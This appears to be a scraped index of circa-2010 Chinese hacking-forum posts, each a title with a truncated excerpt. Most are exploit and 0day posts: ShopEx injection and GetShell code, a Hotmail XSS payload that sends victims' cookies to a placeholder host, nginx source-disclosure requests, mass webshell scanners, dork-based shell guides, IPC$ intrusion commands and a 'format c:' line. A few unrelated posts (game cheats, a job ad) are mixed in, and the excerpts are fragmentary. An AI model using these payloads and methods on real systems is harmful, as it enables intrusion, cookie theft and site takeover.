【Oday】shopex 注入 0day (4.8.5)
作者:俺是农村的 QQ:332876777 \core\include_v5\shopCore.php public function shopCore( ) { parent::kernel( ); if ( isset( $_POST['spgdif'] ) ) { $this->spgdif( ); //进入函数 By:俺是农村的 exit( ); } ............................ } public function spgdif( ) { include_once( CORE_DIR."/func_ext.php" ); if (
【Exp】flash 0day-exp利用
发出来吧。大家一起研究一下。 录像演示: http://www.youtube.com/watch?v=JW7B8aZsT88 http://www.youtube.com/watch?v=dTsi98FkpYU&NR=1 下载地址:http://www.uudisc.com/user/nuclearatk/files/
【Oday】hotmail xss 欺骗代码
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META content="text/html; charset=gb2312" http-equiv=Content-Type> <STYLE>.ExternalClass p {top:rgb('88',80,'180);top:rgb(') !important height:expression( (window.rrr==123)?xxx=8:(eval(code.title)==20088) || (rrr=123));}</STYLE> <META name=GENERATOR content="MSHTML 8.00.6001.18372"> </HEAD> <BODY> <P>-</P> <IMG id=code title='document.location="http://www.xxxxx.com/hotmail.asp?uid=user@hotmail.com&cookie="+escape(document.cookie);' src="http://gfx1.hotmail.com/mail/w3/pr01/ltr/i_safe.gif" width=1 height=1> <div>?л!</div> </BODY> </HTML>
风讯网站管理系统API_Response.asp越权漏洞
添加时间: 2010-06-13 系统编号: WAVDB-01650 影响版本: FooSun > 5.0 程序介绍: FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理
用passcraft突破验证码破解后台管理员账号
用google搜索 inurl:/News/Admin/Login.asp 码 这些网址都带有验证码,这类验证码比较简单 这是用Winsock Expert抓的数据 只要保证 otherpwd和
【原创】求生之路VPK文件封装与导出教学
VPK介绍: VPK封装档是自L4D後新加入的档案格式,目的是为了整合日益渐增的附加档案。 工具下载: GCFScape v1.8 [拆分vpk文件,貌似需要运行环境]:
【Exp】Adobe Reader PDF oday
PDF ODAY 可捆绑任何文件为PDF格式 小漏洞利用工具 珍藏了一个多月了 见没人放出来 现在放出来给大
nginx Source Disclosure and DoS Vulnerabilities
Issue 1: (Remote Source Disclosure) - Description - nginx 0.8.36 is a multi platform HTTP server. This vulnerability exists in the latest Windows version of the application available. nginx on Windows is vulnerable to a remote source disclosure attack. - Technical Details - (Source Download) http://[ webserver IP][:port]index.html::$DATA Issue 2: (Remote DoS (w/ Memory Corruption)) - Description - nginx 0.8.36 (Windows) does not seem to handle encoded directory traversal attempts
Nginx Source Disclosure/Download Vulnerability
TITLE: NGINX [ENGINE X] SERVER <= 0.7.65 (STABLE)/0.8.39 (DEVELOPMENT) SOURCE CODE DISCLOSURE/DOWNLOAD VULNERABILITY TESTED OS: WINDOWS XP SP3/ WINDOWS 7 HOME PREMIUM SEVERITY: HIGH IMPACT: READ/DOWNLOAD SOURCE CODE OF WEB APP FILES DISCOVERED DATE: 2010-06-04 FIXED DATE: 2010-06-07 FIXED VERSIONS: NGINX/0.8.40 AND NGINX/0.7.66 DISCOVERED BY: JOSE A. VAZQUEZ ======ABOUT APPLICATION====== "nginx [engine x] is a HTTP and reverse proxy server, as well as a mail proxy server written by Igor
windows下国外VPN上本国网站卡的解决方案
RT 解决很简单,添加本地路由表即可.麻烦的是找中国的IP段 下载地址 http://chnroutes.googlecode.com/files/pre_created_for_win.zip 他写成了批处理,直接运行就可以了,用完后里面还有删除静态路由表的批处理 把1
【招聘】SOHU招聘 信息安全工程师
工作职责: 1、负责公司内部办公网络安全规划和信息安全服务相关技术、项目管理工作; 2、负责公司内部办公网络安全规划及应用解决方案实施,保障技术
【琐事】惊现大牛黑百度
轻浮菊花,笑而不语 http://tieba.baidu.com/f?kz=794565148 黑百度的大牛表示鸭梨很大,后面的NC说,大牛辛苦了
【漏洞】SiteServer CMS 系统漏洞
siteserver 漏洞 先看简介: SiteServer CMS 网站内容管理系统(著作权登记号2008SR15710)是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的人
【转载】Access导出WebShell
已经是大牛们用烂的方法了, 我刚学到呵呵。。 原来我导出的时候利用的是text方式,在测试的时候发现分号被替换成下划线了,所以以为这种方法不行。
【Oday】shopex 4.8.5.45144 GetShell
by:俺是农村的 QQ:332876777 \core\include_v5\crontab.php zend加密后的,我只发布解密后的代码。 public function run( ) { $this->logFile = HOME_DIR."/logs/access.log.php"; $this->now = time( ); $this->viewStat( ); $messenger =& $this->loadModel( "system/messenger" ); $messenger->runQueue( ); }
求生之路2秘籍及作弊码和控制台全套指令
--------------------------------------------- 当使用 Srcds.exe 开服务器时,玩家进入游戏会显示的“今日消息”和“全球排名”修改方法: 今日消息 默认内容:http://www.l4d.com/l4d
利用GINA实现U盘开机锁
文章作者:[E.S.T] masepu 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 注:本文章首发《黑客防线》,后由原创作者提交
DEDE 0DAY 批量扫描程序 DEDE5.5批量拿shell工具
我试着找了个关键词扫了下,一小时1000+shell好轻松... 6.8 日更新 之前忘了告诉大家导入的网址要事先整理,去掉“http://",只
【Exp】adobe 0day(CVE-2010-1297)样本
adobe 0day(CVE-2010-1297)样本 下载地址:http://t00ls.net/thread-8228-1-1.html
【Exp】DDLCMS 2.1(皮)远程文件包含漏洞
============================================================== DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability ============================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \
【漏洞】乐彼多语言网店通杀拿SHeLL
作者:玉鼎真人 vs 龙儿心 利用方法 Google搜索:Powered By 56770 Eshop 搜索 Powered By 56770 Eshop 获得约 43,700 条结果 随便找一个网站 就他吧www.XXXcom 一个外
关于sunwear牛被恶搞的真相
转自:http://t00ls.net/thread-8121-1-1.html 首先声明我只是猜测 刚在群里说了句:骗钱是假,骗情才是真,马上
【转载】Molyx 2.81多个bug
by:xhm1n9 MolyX以前还是有蛮大的用户下载量的,现在没落了,记得刚开始学php时有看过这程序,但是没能找到bug,今天偶然路过用这程序的论坛,非
Dos命令Tracert跟踪路由
Tracert 通过递增“存在时间 (TTL)”字段的值将“Internet 控制消息协议 (ICMP) 回显请求”或 ICMPv6 消息发送给目标可确定到达目标的路径。路径将以列表形
【漏洞】phpmps 2.0 GBK 0day
作者:俺是农村的 QQ:332876777 交几个懂php的朋友,一起交流。谢谢大家! 首先感谢,oldju
一些网络DOS命令,希望对新手有用
format c: /q/u net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映
全套手机秘籍/手机指令
(一)各种锁中英文对照 SP锁:英文名ServiceProrider的简写,指运营商锁机码 ENT锁:网络锁 IMSI锁:用户识别码锁 KEY锁:键
中国黑客谱系
导读--17岁的莱安诺·拉斯特凭想象写出《骇客帝国》,hacker传入中国,被译为黑客。 一个时代的终结终需要一个符号。2004年最后一天,
扔掉工具跟我一起学ASP手工注入!
扔掉工具 跟我一起学ASP手工注入! 前言: 现在的网络,脚本入侵十分的流行,而脚本注入漏洞更是风靡黑客界。